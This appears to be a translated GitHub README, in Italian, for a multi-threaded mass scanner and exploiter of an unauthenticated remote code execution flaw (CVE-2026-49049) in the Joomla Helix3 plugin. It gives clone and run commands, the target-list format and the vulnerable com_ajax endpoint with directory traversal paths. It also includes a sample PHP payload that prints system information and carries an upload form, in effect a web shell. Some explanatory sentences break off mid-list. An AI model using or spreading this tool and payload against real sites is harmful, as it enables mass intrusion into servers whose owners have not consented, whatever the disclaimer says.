
Scanner di vulnerabilità di massa per CVE-2026-49049 – Esecuzione remota di codice non autenticata nel plugin Joomla Helix3. Multi-thread, rileva sia payload PHP eseguiti che grezzi.
Scanner di massa per vulnerabilità CVE-2026-49049 - Esecuzione remota di codice non autenticata nel framework Helix3 di Joomla.
Questo strumento verifica più siti Joomla per la vulnerabilità CVE-2026-49049 presente nel plugin Helix3. La vulnerabilità consente a un attaccante non autenticato di caricare ed eseguire codice PHP arbitrario sul server di destinazione.
Lo scanner tenta di:
com_ajax con il plugin helix3.requestspip install requests
🛠 Installazione
git clone https://github.com/Jenderal92/CVE-2026-49049.git
cd CVE-2026-49049
chmod +x cve-2026-49049.py
🚀 Utilizzo
python2 cve-2026-49049.py targets.txt
Formato di input
Ogni riga in targets.txt deve contenere un dominio o un IP:
example.com
https://example.com
http://192.168.1.100
File di output
File Descrizione results.txt URL vulnerabili in cui il payload è stato eseguito rez.txt URL in cui il payload è stato caricato ma non eseguito (PHP grezzo)
Esempio di output
============================================================
CVE-2026-49049 Mass Scanner
Results: results.txt (executed)
Raw PHP: rez.txt (not executed)
============================================================
[*] Loaded 150 targets
[*] Using 20 threads
[+] VULNERABLE: https://target.com
[*] RAW PHP: https://target2.com
[-] NOT VULNERABLE: https://secure.com
============================================================
[+] Selesai!
[+] Vulnerable: 12
[+] Raw PHP: 5
[+] Vulnerable URLs:
https://target.com/tmp_123456.php.json
⚙️ Configurazione
Puoi modificare le seguenti variabili all'interno dello script:
Variabile Default Descrizione THREADS 20 Numero di thread concorrenti PATHS ['../../../', '../../../../'] Percorsi di directory traversal TIMEOUT 5 Timeout delle richieste HTTP RESULT_FILE 'results.txt' File di output per i siti vulnerabili RAW_RESULT_FILE 'rez.txt' File di output per i siti con PHP grezzo
🧠 Come funziona
Lo script invia una richiesta POST a:
/index.php?option=com_ajax&plugin=helix3&format=json
con un payload che:
Poi verifica se il file è accessibile e se il codice PHP viene eseguito o semplicemente mostrato come testo semplice.
Esempio di payload
<?php
$s = "Shinday";
echo '<center><pre><br><br><h1 style="color:red;">'.$s.'</h1><br>'.php_uname()."\n".'<br><br><br>';
// ... upload form
?>
⚠️ Disclaimer
Questo strumento è destinato esclusivamente a scopi didattici e a test autorizzati.
L'uso non autorizzato di questo strumento contro sistemi di cui non si possiede la proprietà o per i quali non si dispone di un permesso esplicito di test è illegale. L'autore non è responsabile di qualsiasi uso improprio o danno causato da questo strumento.
Per ulteriori disclaimer, puoi consultare la copertina di Jenderal92. Puoi verificarlo QUI !!!